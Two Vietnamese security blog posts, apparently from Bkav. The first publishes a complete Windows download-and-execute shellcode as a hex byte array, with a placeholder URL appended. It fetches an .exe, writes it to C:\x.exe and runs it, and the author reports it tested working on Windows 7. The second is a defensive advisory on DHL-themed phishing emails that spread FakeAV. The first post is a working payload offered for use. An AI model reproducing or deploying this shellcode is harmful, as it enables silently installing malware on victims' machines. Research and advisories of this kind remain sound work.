Gần đây, tôi cần một shellcode có thể tải và thực thi một file .exe trên Windows 7 để phục vụ cho thử nghiệm của mình. Tuy nhiên không có sẵn một shellcode như thế.

Trong khi, shellcode download và thực thi được sinh bởi Metasploit Framework hiện tại không hoạt động được trên Windows 7. Hơn nữa, việc tìm kiếm trên mạng cũng không đem lại kết quả khả quan.

Sau khi tham khảo shellcode của “SkyLined” và một số shellcode khác từ trang milw0rm.com, tôi đã viết một shellcode theo ý tưởng của mình.

Và đây là kết quả  mà tôi muốn chia sẻ với các bạn:

shellcode[] =

“\xEB\x50\x31\xF6\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E”

“\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x67″

“\xE3\xEC\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99″

“\x02\x17\xC1\xCA\x04\xAE\x75\xF8\x3B\x54\x24\x04\xE0\xE4\x75\xCE”

“\x8B\x53\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C”

“\x97\xC3\x68\x8E\x48\x8B\x63\xE8\xA6\xFF\xFF\xFF\x66\xB8\x6C\x6C”

“\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD5\x68\x83″

“\x2B\x76\xF6\xE8\x8A\xFF\xFF\xFF\xEB\x21\x50\xFF\xD5\x68\xE7\xC4″

“\xCC\x69\xE8\x7B\xFF\xFF\xFF\x50\x4C\x4C\x4C\x4C\xFF\xD5\x68\x77″

“\xA6\x60\x2A\xE8\x6A\xFF\xFF\xFF\x50\xFF\xD5\x50\x68\x2E\x65\x78″

“\x65\x68\x43\x3A\x5C\x78\x50\x50\x89\xE3\x80\xC3\x08\x53\xE8\xC7″

“\xFF\xFF\xFFhttp://website.com/file.exe”;

Như có thể thấy, URL sẽ được đặt ở cuối shellcode.

Sellcode đã được thử nghiệm thành công trên Windows 7, và có thể sẽ hoạt động được trên tất cả các phiên bản từ Windows 2000 trở đi.

Lê Mạnh Tùng, Senior Security Researcher, Bkav Security

Gần đây, hệ thống Honeypot của chúng tôi phát hiện một chiến dịch lừa đảo mới, phát tán FakeAV qua những email giả mạo thư chăm sóc khách hàng của DHL, một công ty chuyển phát nhanh nổi tiếng trên thế giới.

Nội dung email lừa đảo

Vẫn đánh vào sự hiếu kì và “lòng tham” của người sử dụng, kẻ xấu đã phát tán các email với nội dung rất “hấp dẫn” dẫn dụ người sử dụng mở file đính kèm. “Bưu kiện đã được gửi tới địa chỉ nhà của bạn và sẽ đến nơi trong vòng 3 ngày làm việc. Thông tin chi tiết và mã số biên nhận (tracking number) được đính kèm trong tài liệu dưới đây”. Nếu cả tin làm theo chỉ dẫn đó, vô tình bạn đã “mở toang cửa” cho FakeAV lây nhiễm vào máy tính.

Sau khi lây nhiễm vào máy tính, FakeAV “dọa nạt” người sử dụng bằng những thông báo giả về hệ thống

Virus này (Bkav nhận diện với tên W32.FakeDHL.Worm) download FakeAV từ một server đặt tại Nga – nơi mà việc sử dụng virus máy tính để lừa đảo kiếm tiền đang hoành hành khá dữ dội:

Địa chỉ download FakeAV

Có thể nói Ransomware và FakeAV hiện đang là 2 dòng virus “kiếm tiền” giỏi nhất trong thế giới malware. Chúng liên tục ra biến thể mới, liên tục cải tiến, tăng cường các kênh phát tán. Do đó, trong khi chờ đợi các nhà chức trách có những chế tài, hành động cụ thể để dẹp bỏ các hình thức lừa đảo bằng virus máy tính, bạn nên chủ động bảo vệ máy tính của mình trước. Ngoài việc cảnh giác khi mở các file đính kèm trong email, bạn nên trang bị cho máy tính của mình một chương trình diệt virus có bản quyền để được cập nhật thường xuyên và có được sự hỗ trợ kịp thời từ các chuyên gia khi chẳng may gặp sự cố. Đừng vì tiếc tiền mua bản quyền phần mềm để sau đó phải mất rất nhiều tiền cho những kẻ lừa đảo.

Phạm Tuấn Vũ, Malware Researcher, Bkav R&D